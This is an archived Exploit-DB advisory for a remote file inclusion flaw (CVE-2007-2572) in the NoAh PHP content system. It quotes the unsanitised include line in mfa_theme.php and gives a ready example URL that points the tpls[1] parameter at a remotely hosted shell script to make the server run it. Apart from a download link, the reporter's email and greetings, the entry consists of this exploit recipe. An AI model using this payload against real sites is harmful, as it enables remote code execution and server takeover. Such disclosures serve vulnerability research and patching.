NoAh <= 0.9 pre 1.2 mfa_theme.php Remote File Inclusion Vulnerability

2007-05-06T00:00:00
ID EDB-ID:3861
Type exploitdb
Reporter kezzap66345
Modified 2007-05-06T00:00:00

Description

NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion Vulnerability. CVE-2007-2572. Webapps exploit for php platform

                                        
                                            ##############################################################################################
##############################################################################################
#NoAh 0.9 The PHP Content Architect &lt;=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:noah/modules/noevents/templates/mfa_theme.php
#
&lt;?php include($tpls[1]); ?&gt;
#
#BUG:
#
#Example:http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=131995&package_id=148681&release_id=318628
##############################################################################################
#
#kezzap66345@hotmail.com
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-06]